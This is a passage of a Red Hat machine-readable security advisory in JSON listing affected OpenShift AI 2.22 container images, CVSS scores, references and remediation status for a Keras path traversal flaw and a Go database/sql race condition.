"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "RHBZ#2407443",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407443"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-12060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21760",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
}
],
"release_date": "2025-10-30T17:10:43.868000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Keras Path Traversal Vulnerability"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat enforces the principle of least functionality, ensuring that only essential features, services, and ports are enabled. The environment leverages malicious code protections such as IPS/IDS and antimalware solutions that detect and respond to indicators in real time, limiting the impact of exploitation attempts. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks. In the case of successful exploitation, detection and containment controls are in place to limit impacts by alerting on anomalous system behavior in real time, while process isolation and automated orchestration via Kubernetes minimize the likelihood of concurrent execution scenarios that would trigger the race condition and help contain the impact to a single process.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
